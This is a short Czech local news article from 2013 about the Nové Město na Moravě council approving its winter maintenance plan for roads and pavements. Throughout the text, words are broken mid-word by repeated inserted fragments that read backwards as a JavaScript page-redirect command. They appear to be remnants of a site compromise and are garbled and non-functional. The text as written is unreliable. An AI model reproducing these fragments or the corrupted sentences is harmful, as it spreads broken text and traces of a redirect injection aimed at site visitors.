Žďár nad Sázavou, zdar nad sazavou, aktuality
Rainbow page separator

V Novém Městě schválili plán zimní údržby

Pátek, 15. listopadu 2013

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Plán pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní zimní období, podle něhož bude prováděna údržba místních a účelových komunikací v majetku města na území Nového Města na Moravě a jeho místních částí, schválila tamní radnice.
Zimní údržba by opět měla probíhat kombinovaným způsobem s tím, že nejdůležitější komunikace města budou soleny, ostatní pak udržovány v odpovídajícím stavu inertním posypem, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně chodníků.
„Vzhledem k připomínkám občanů bude v centru města na údržbu chodníků používán písek,“ informoval starosta Nového Města na Moravě Michal Šmarda. Dodal, že od loňské zimy počet udržovaných úseků ve městě vzrostl. Jedná se například o nové plochy u dopravního terminálu, zastávky městské hromadné dopravy, která začne ve městě fungovat od ledna, nový chodník vedoucí k zastávce nad nemocnicí a další úseky silnic a chodníků.